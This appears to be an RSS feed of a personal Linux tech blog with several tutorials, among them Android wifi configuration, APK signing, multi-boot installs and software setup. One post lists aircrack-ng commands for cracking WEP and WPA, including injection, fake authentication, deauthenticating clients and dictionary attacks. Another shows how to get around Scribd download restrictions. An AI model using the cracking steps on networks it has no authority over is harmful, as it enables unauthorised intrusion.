<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HydTech &#187; linux</title>
	<atom:link href="http://hydtechblog.com/tag/linux/feed/" rel="self" type="application/rss+xml" />
	<link>http://hydtechblog.com</link>
	<description>anotha hyd anotha day</description>
	<lastBuildDate>Sun, 24 Jul 2011 22:38:31 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>rename multiple file with same extension in Linux</title>
		<link>http://hydtechblog.com/2011/05/11/rename-multiple-file-with-same-extension-in-linux/</link>
		<comments>http://hydtechblog.com/2011/05/11/rename-multiple-file-with-same-extension-in-linux/#comments</comments>
		<pubDate>Wed, 11 May 2011 22:49:08 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[apache web server]]></category>
		<category><![CDATA[htaccess]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[php extension]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=1065</guid>
		<description><![CDATA[I want to rename all files with .txt to .sh and wildcards don&#8217;t work to well with the rm command here&#8217;s the trick: for file in *.txt; do mv $file `basename $file .txt`.sh; done]]></description>
			<content:encoded><![CDATA[<p>I want to rename all files with .txt to .sh and wildcards don&#8217;t work to well with the rm command</p>
<p>here&#8217;s the trick:</p>
<p><code>for file in *.txt; do mv $file `basename $file .txt`.sh; done </code></p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=1065&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2011/05/11/rename-multiple-file-with-same-extension-in-linux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to connect to Ad Hoc networks using Tmobile G1 Android</title>
		<link>http://hydtechblog.com/2009/09/14/how-to-connect-to-ad-hoc-networks-using-tmobile-g1-android/</link>
		<comments>http://hydtechblog.com/2009/09/14/how-to-connect-to-ad-hoc-networks-using-tmobile-g1-android/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 18:38:07 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Android]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[ad hoc]]></category>
		<category><![CDATA[g1]]></category>
		<category><![CDATA[hero]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[tiwlan]]></category>
		<category><![CDATA[tiwlan.ini]]></category>
		<category><![CDATA[tmobile]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wpa_supplicant]]></category>
		<category><![CDATA[wpa_supplicant.conf]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=464</guid>
		<description><![CDATA[Intro The G1 does not connect to ad hoc networks through the wifi manager but we can hack it to allow scanning and connecting to ad hocs. I&#8217;ve been trying to figure this out for the longest time. Before you begin, you need to root your G1 and be comfortable using the command line. We [...]]]></description>
			<content:encoded><![CDATA[<p><strong><em>Intro</em></strong></p>
<p>The G1 does not connect to ad hoc networks through the wifi manager but we can hack it to allow scanning and connecting to ad hocs.  I&#8217;ve been trying to figure this out for the longest time.  Before you begin, you need to root your G1 and be comfortable using the command line.  We will be editing tiwlan.ini and wpa_supplicant.conf.  I will be showing you 2 ways to edit the files.  Using vi and adb.</p>
<p><strong><br />
<em>Settings</em></strong></p>
<p>edit tiwlan.ini to read:</p>
<p>WiFiAdHoc = <a href="http://hydtechblog.com">1</a><br />
dot11DesiredSSID = HydtechAdhoc (or whatever name u want)<br />
dot11DesiredBSSType = 0</p>
<p>edit wpa_supplicant.conf to read:</p>
<p>ctrl_interface=tiwlan0<br />
update_config=1<br />
eapol_version=1<br />
ap_scan=2  (tells wpa_supplicant to scan hidden networks)</p>
<p>network={<br />
    ssid=&#8221;HydtechAdhoc&#8221;<br />
    scan_ssid=1    (for APs with multiple SSIDS)<br />
    mode=1<br />
    key_mgmt=NONE<br />
    group=WEP104<br />
    auth_alg=SHARED<br />
    wep_key0=&#8221;MyWepKey&#8221;  (replace MyWepKey with your key)<br />
}</p>
<p><strong><em>How to edit using vi:</em></strong></p>
<p>Download terminal from the market and type:</p>
<p>su (for superuser mode)<br />
mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system (mount partition as writable)<br />
vi /system/etc/wifi/tiwlan.ini (open tiwlan.ini in vi text editor)</p>
<p>now type A to enter editing mode, finish editing your file and hold trackball+1 to stop editing.  To save and exit type :wq</p>
<p>vi /data/misc/wifi/wpa_supplicant.conf (open file for editing)</p>
<p>edit with the settings given above and exit and don&#8217;t forget to change the partition back to read only<br />
mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system</p>
<p>reboot</p>
<p><strong><em>How to edit files with adb on Ubuntu:</em></strong></p>
<p>Connect your g1 to the computer using a usb cable and make sure USB debugging in enabled<br />
Open up terminal and type<br />
cd /home/hydtech/[android sdk folder]/tools (navigate to the directory which has you adb tool)</p>
<p>get the files from the device and place them in the root folder<br />
sudo ./adb pull /system/etc/wifi/tiwlan.ini /<br />
sudo ./adb pull /data/misc/wifi/wpa_supplicant.conf /</p>
<p>edit and save the files with the settings provided above using gedit or kate or what have you</p>
<p>make the partition read writable<br />
adb shell<br />
mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system<br />
exit</p>
<p>place the files back onto the device<br />
sudo ./adb push /tiwlan.ini /system/etc/wifi/tiwlan.ini<br />
sudo ./adb push /wpa_supplicant.conf /data/misc/wifi/wpa_supplicant.conf</p>
<p>make partition read only again<br />
adb shell<br />
mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system<br />
exit</p>
<p>reboot device<a href="http://hydtechblog.com">.</a></p>
<p><em><strong>Troubleshooting</strong></em></p>
<p>shows connected but no internet<br />
1. I was having a problem where the connection would keep disconnecting and when it would connect, it wouldn&#8217;t load pages.  To fix this I had to disable my WEP key.</p>
<p>SSID not showing<br />
2. If the SSID isn&#8217;t showing up in the list, make sure you have ap_scan=2 in your wpa_supplicant</p>
<p>Unsuccessful connection<br />
3. Try enabling static IP if DHCP isn&#8217;t working for you.  It&#8217;s under advanced menu.</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=464&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/09/14/how-to-connect-to-ad-hoc-networks-using-tmobile-g1-android/feed/</wfw:commentRss>
		<slash:comments>30</slash:comments>
		</item>
		<item>
		<title>Cracking WEP &amp; WPA with IBM Lenovo X60 &#8211; Basics</title>
		<link>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/</link>
		<comments>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 05:43:21 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[lenovo]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[wpa]]></category>
		<category><![CDATA[x60]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=460</guid>
		<description><![CDATA[At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver. Follow these steps for a succesful WEP crack in Ubuntu: download necessary files sudo apt-get install aircrack-ng place [...]]]></description>
			<content:encoded><![CDATA[<p>At first injection with the Intel pro wireless cards was impossible.  Then came the ipwraw driver.  Now, we no longer need the ipwraw as the iwl3945 card supports injection<a href="http://hydtechblog.com">.</a>  Most linux distros now ship with this driver.</p>
<p>Follow these steps for a succesful WEP crack in Ubuntu:</p>
<p>download necessary files<br />
sudo apt-get install aircrack-ng</p>
<p>place card in monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>test injection<br />
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80  mon0<br />
(0% means injection not working)</p>
<p>capture data and write to file called output<br />
 sudo airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w output mon0</p>
<p>fake authentication<br />
 sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>replay mode<br />
 sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>run aircrack<br />
sudo  aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap</p>
<p>For WPA cracking follow this:</p>
<p>monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>collect handshake<br />
sudo  airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w psk mon0</p>
<p>deauth connected client<br />
sudo  aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0</p>
<p>cracking<br />
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap</p>
<p>These are just refreshers. For more help check www.aircrack-ng.org</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=460&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Sign apk package files for publishing in the Android market with keytool and jarsigner on Ubuntu</title>
		<link>http://hydtechblog.com/2009/08/13/sign-apk-package-files-for-publishing-in-the-android-market-with-keytool-and-jarsigner-on-ubuntu/</link>
		<comments>http://hydtechblog.com/2009/08/13/sign-apk-package-files-for-publishing-in-the-android-market-with-keytool-and-jarsigner-on-ubuntu/#comments</comments>
		<pubDate>Thu, 13 Aug 2009 21:44:02 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Android]]></category>
		<category><![CDATA[eclipse]]></category>
		<category><![CDATA[jarsigner]]></category>
		<category><![CDATA[keytool]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[market]]></category>
		<category><![CDATA[publish]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=436</guid>
		<description><![CDATA[Once you&#8217;ve completed your package with Eclipse and you want to publish it to the android market, google requires that you sign it.  For this step you need two tools.  Keytool and jarsigner can be obtained through JDK. Open up terminal and install jdk: sudo apt-get install sun-java6-jdk Use keytool to make yourself a new [...]]]></description>
			<content:encoded><![CDATA[<p>Once you&#8217;ve completed your package with Eclipse and you want to publish it to the android market, google requires that you sign it.  For this step you need two tools.  Keytool and jarsigner can be obtained through JDK.</p>
<p>Open up terminal and install jdk:</p>
<p><code>sudo apt<a href="http://hydtechblog.com">-</a>get install sun-java6-jdk</code></p>
<p>Use keytool to make yourself a new key:</p>
<p><code>keytool -genkey -v -keystore mykeystore.keystore -alias aliasname -keyalg RSA -validity 10000</code></p>
<p>genkey &#8211; generate the key<br />
v &#8211; verbose mode<br />
keystore &#8211; select name of keystore<br />
alias &#8211; creates an alias for the key<br />
keyalg &#8211; specifies the encryption algorithm used to generate the key<a href="http://hydtechblog.com">.</a> Ex: RSA, DSA<br />
validity &#8211; when should the key expire in days? (google requires like a 50 year expiry)</p>
<p>The keytool will walk you through the process of choosing a password and name.  Once the key is made, you need to sign the apk with jarsigner using this key:</p>
<p><code>jarsigner -verbose -keystore mykeystore.keystore programfile.apk aliasname</code></p>
<p>keystore &#8211; keystore containing your private key<br />
verbose &#8211; verbose mode</p>
<p>You will be prompted for your password.  You are ready to go.</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=436&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/08/13/sign-apk-package-files-for-publishing-in-the-android-market-with-keytool-and-jarsigner-on-ubuntu/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Lenovo Thinkpad X60 with Fedora 10, openSuse 11, Ubuntu 9.04 and Windows XP</title>
		<link>http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/</link>
		<comments>http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/#comments</comments>
		<pubDate>Thu, 26 Mar 2009 21:28:38 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[fedora]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[apt-get]]></category>
		<category><![CDATA[gnome]]></category>
		<category><![CDATA[kde]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ntfs-3g]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[windows xp]]></category>
		<category><![CDATA[yast2]]></category>
		<category><![CDATA[yum]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=284</guid>
		<description><![CDATA[I&#8217;ve been using Ubuntu dual booted with windows for quite a while now, but due to driver compatibility issues and lack of knowledge used windows for the most part. Since Ubuntu 8.10, I&#8217;ve completely switched over to Ubuntu and love it. Mostly because it&#8217;s FREE! Windows is still hanging around in case I might need [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been using Ubuntu dual booted with windows for quite a while now, but due to driver compatibility issues and lack of knowledge used windows for the most part.  Since Ubuntu 8.10, I&#8217;ve completely switched over to Ubuntu and love it.  Mostly because it&#8217;s FREE!  Windows is still hanging around in case I might need it for some program in the future.  I use Thunderbird as my email client and Opera as my web browser.  One of my main concerns was sharing the profiles for these programs, but NTFS-3G has made life easier.</p>
<p>After feeling comfortable with Ubuntu, I decided I needed to expand my knowledge by learning to use KDE; different package managers like yum and yast; and the possibility of having multiple Linux Oses on single partitions.  After doing some research, I decided I should either go with openSuse or Fedora.  Then, I figured: &#8220;Why not both?&#8221; and leave Ubuntu and Windows intact.  I downloaded the Live CD&#8217;s for both Oses.  The Live CD installation has less programs and tools installed compared to the DVD installation.</p>
<p>I opened Gparted on Ubuntu to make extra partitions for Fedora and openSuse, but I realized I can&#8217;t have more than 4 primary partitions without hacking the MBR.  I deleted the Linux Swap partition because I already have 2GB of RAM.  I resized my Windows and Storage partitions and made one extra partition on which I would install both Fedora and openSuse.  I split the partition into 2 logical partitions of about 5GB each.</p>
<p><img class="aligncenter size-full wp-image-308" title="gparted" src="http://hydtech.files.wordpress.com/2009/03/gparted.png" alt="gparted" width="510" height="382" /></p>
<p>Since my Lenovo does not have an optical drive, I had to use an external USB drive and allow the BIOS to boot from it</p>
<p>Popped in the Fedora Live CD and installed Fedora.  I selected the first logical partition and set this location as &#8220;/&#8221; (root) and opted not to use a swap space.  When it asks to install GRUB, you can choose not to or to install it at the beginning of the Root partition and not at the beginning of the whole hard drive because Ubuntu has already installed GRUB there and you might not want to write over it.  I chose not to install GRUB.  It was a painless install.  Restarted and booted into Fedora to make sure it worked.</p>
<p>Next, I popped in the openSuse Live CD and installed it to the second logical partition also without swap space.  Again, chose not to install GRUB.  Install was again pretty simple.  Booted into openSuse to make sure it worked.</p>
<p>Now, I had to update my GRUB to include the other Oses.  I could have done it manually, but I chose to upgrade my 8.10 Intrepid to 9.04 Jaunty by hitting &#8220;Alt+F2&#8243; and typing &#8220;upgrade-manager -d&#8221;, which updated the entries in GRUB automatically.</p>
<p><img class="aligncenter size-full wp-image-309" title="updatemanager" src="http://hydtech.files.wordpress.com/2009/03/updatemanager.png" alt="updatemanager" width="510" height="382" /></p>
<p>.</p>
<p>.</p>
<p>.</p>
<p><a href="http://hydtechblog.com/2009/03/26/how-to-install-opera-and-thunderbird-and-share-the-profiles-between-windows-ubuntu-fedora-and-opensuse/"><span style="color:#ff0000;">Still one more issue: How to install Opera and Thunderbird and share the profiles between Windows, Ubuntu, Fedora and openSuse.  This call for a new blog entry.</span></a></p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=284&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>How To save documents from Scribd when disabled by user with Ubuntu Intrepid or Jaunty</title>
		<link>http://hydtechblog.com/2009/03/17/scribd/</link>
		<comments>http://hydtechblog.com/2009/03/17/scribd/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 06:59:13 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[fedora]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[cups-pdf]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[karmic]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[pdf printer]]></category>
		<category><![CDATA[scribd]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=278</guid>
		<description><![CDATA[Some users disable the option to download a document from scribd but the option to print is still available. We can use this to our advantage and save the document by printing the file to PDF. In Ubuntu, we need to install cups-pdf to create a postscript printer. Check my previous post here for a [...]]]></description>
			<content:encoded><![CDATA[<p>Some users disable the option to download a document from scribd but the option to print is still available.  We can use this to our advantage and save the document by printing the file to PDF.</p>
<p><a href="http://hydtechblog.com/2009/03/17/how-to-print-to-pdf-in-ubuntu-intrepid-ibex-and-jaunty-jackalope/">In Ubuntu, we need to install cups-pdf to create a postscript printer.  Check my previous post here for a tutorial.</a></p>
<p>After installing the PDF printer, go to the document you want to save on scribd.  Select more -&gt; Print</p>
<p><img class="aligncenter size-full wp-image-279" title="scribd1" src="http://hydtech.files.wordpress.com/2009/03/scribd1.png" alt="scribd1" width="510" height="382" /></p>
<p>Select the PDF printer and hit print.  and wait&#8230;..<a href="http://hydtechblog.com">.</a>&#8230;&#8230;&#8230;. this can take upto 10-15 minutes depending on how big the file is.</p>
<p><img class="aligncenter size-full wp-image-280" title="scribd2" src="http://hydtech.files.wordpress.com/2009/03/scribd2.png" alt="scribd2" width="510" height="382" /></p>
<p>Check the print status.  6 minutes and still printing&#8230;&#8230;</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/scribd3.png" alt="scribd3" title="scribd3" width="510" height="382" class="aligncenter size-full wp-image-281" /></p>
<p>When done, the file will be saved in the PDF folder we created and will be called _stdin_.pdf</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/scribd4.png" alt="scribd4" title="scribd4" width="510" height="382" class="aligncenter size-full wp-image-282" /></p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=278&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/03/17/scribd/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Install/Update Opera 9.64 in Ubuntu Intrepid Ibex/Jaunty Jackalope</title>
		<link>http://hydtechblog.com/2009/03/08/installupdate-opera-964-in-ubuntu-intrepid-ibexjaunty-jackalope/</link>
		<comments>http://hydtechblog.com/2009/03/08/installupdate-opera-964-in-ubuntu-intrepid-ibexjaunty-jackalope/#comments</comments>
		<pubDate>Sun, 08 Mar 2009 19:36:25 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[browser]]></category>
		<category><![CDATA[intrepid]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[karmic]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[opera]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=261</guid>
		<description><![CDATA[In this tutorial I will show you how to install or update to Opera 9.64 in Ubuntu. This guide is for a beginner to the operating system and will work for any version of Ubuntu, including other Debian based linux distributions. If you are upgrading, first check for an update under help in the browser [...]]]></description>
			<content:encoded><![CDATA[<p>In this tutorial I will show you how to install or update to Opera 9.64 in Ubuntu.  This guide is for a beginner to the operating system and will work for any version of Ubuntu, including other Debian based linux distributions.</p>
<p>If you are upgrading, first check for an update under help in the browser or you can directly go to the website and download the latest version.</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/operaup1.png" alt="opera update" title="opera update" width="510" height="382" class="aligncenter size-full wp-image-262" /></p>
<p>save the file to the desktop and close the browser.<br />
<img src="http://hydtech.files.wordpress.com/2009/03/operaup2.png" alt="opera update " title="opera update " width="510" height="382" class="aligncenter size-full wp-image-263" /></p>
<p>double click the .deb file and click install package even if you are upgrading.<br />
<img src="http://hydtech.files.wordpress.com/2009/03/operaup3.png" alt="opera update" title="opera update" width="510" height="382" class="aligncenter size-full wp-image-264" /></p>
<p>close the installation process and restart your browser<br />
<img src="http://hydtech.files.wordpress.com/2009/03/operaup4.png" alt="opera update" title="opera update" width="510" height="382" class="aligncenter size-full wp-image-265" /></p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=261&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/03/08/installupdate-opera-964-in-ubuntu-intrepid-ibexjaunty-jackalope/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>How to fresh install OpenOffice 3.0.1 on Ubuntu 8.10 Intrepid, 9.04 Jaunty, Fedora 10 and openSuse 11</title>
		<link>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/</link>
		<comments>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/#comments</comments>
		<pubDate>Tue, 24 Feb 2009 01:51:44 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[fedora]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[intrepid]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[openoffice]]></category>
		<category><![CDATA[openoffice 3.0.1 ubuntu intrepid ibex fresh clean install]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=226</guid>
		<description><![CDATA[Instructions for Ubuntu: Yesterday I noticed that the menu on my OpenOffice had some weird characters. I finally figured out that some of the system fonts in Ubuntu are not compatible with OO. I managed to change the fonts back by going to System -&#62; Preferences -&#62; Appearance -&#62; Fonts. But it was too late. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Instructions for Ubuntu:</strong></p>
<p>Yesterday I noticed that the menu on my OpenOffice had some weird characters.  I finally figured out that some of the system fonts in Ubuntu are not compatible with OO.  I managed to change the fonts back by going to System -&gt; Preferences -&gt; Appearance -&gt; Fonts.  But it was too late.  During the process I upgraded, uninstalled the whole program and reinstalled it back again<a href="http://hydtechblog.com">.</a> For this process, I used synaptic package manager to find everything that said openoffice and marked it for complete removal.</p>
<p><img class="aligncenter size-full wp-image-228" title="remove OpenOffice" src="http://hydtech.files.wordpress.com/2009/02/oo_removal.png" alt="remove OpenOffice" width="510" height="382" /></p>
<p>I could have also opened up terminal and typed:<br />
<code>sudo apt-get remove openoffice*.*</code></p>
<p>Then, I went to openoffice.org and downloaded the .deb file for 3.0.1 (OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz) and extracted it to the desktop. Then I typed:<br />
<code>sudo dpkg -i ~/Desktop/OOO300_m15_native_packed-1_en-US.9379/DEBS/*.deb</code><br />
<img class="aligncenter size-full wp-image-230" title="install_office" src="http://hydtech.files.wordpress.com/2009/02/install_office.png" alt="install_office" width="510" height="382" /></p>
<p>dpkg is a tool to install, build, remove and manage Debian GNU/Linux packages<a href="http://www.hydtechblog.com">.</a> The -i option is used to install a file or in this case, several files.  We selected *.deb which means select all the files with a .deb extension and install them.  We could have alternatively double clicked each .deb package and installed it separately, but the command line is a much more powerful option.</p>
<p>Next, to install the last package stored in a different folder, I typed:<br />
<code>sudo dpkg -i ~/Desktop/OOO300_m15_native_packed-1_en-US.9379/DEBS/desktop-integration/openoffice.org3.0-debian-menus_3.0-9376_all.deb</code><br />
<img class="aligncenter size-full wp-image-231" title="install_office2" src="http://hydtech.files.wordpress.com/2009/02/install_office2.png" alt="install_office2" width="510" height="382" /></p>
<p>I believe I could have used the &#8211;recursive or -R option and specified the directory, which would have installed all the packages in the folder including all the sub-folders.</p>
<p>That&#8217;s all it took.</p>
<p><strong>Instructions for Fedora and openSuse: </strong></p>
<p>Goto openoffice.org and Download the rpm in tar.gz format onto the Desktop</p>
<p>open up terminal, become root and untar the file:<br />
<code>su<br />
(enter password)<br />
tar -xvf /home/black/Desktop/OOo_3.0.1_LinuxIntel_install_wJRE_en-US.tar.gz</code><br />
<img class="aligncenter size-full wp-image-317" title="oo1" src="http://hydtech.files.wordpress.com/2009/02/oo1.png" alt="oo1" width="510" height="382" /><br />
cd into the directory:<br />
<code>cd OOO300_m15_native_packed-1_en-US.9379/</code><br />
<img class="aligncenter size-full wp-image-318" title="oo2" src="http://hydtech.files.wordpress.com/2009/02/oo2.png" alt="oo2" width="510" height="382" /><br />
setup:<br />
<code>./setup</code><br />
<img class="aligncenter size-full wp-image-319" title="oo3" src="http://hydtech.files.wordpress.com/2009/02/oo3.png" alt="oo3" width="510" height="382" /><br />
follow install directions:<br />
<img class="aligncenter size-full wp-image-320" title="oo4" src="http://hydtech.files.wordpress.com/2009/02/oo4.png" alt="oo4" width="510" height="382" /></p>
<p><img class="aligncenter size-full wp-image-321" title="oo5" src="http://hydtech.files.wordpress.com/2009/02/oo5.png" alt="oo5" width="510" height="382" /></p>
<p>[digg=http://digg.com/linux_unix/Tutorial_How_to_Install_OpenOffice_on_Ubuntu_Fedora_openSuse]</p>
<p>Yatta !</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=226&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

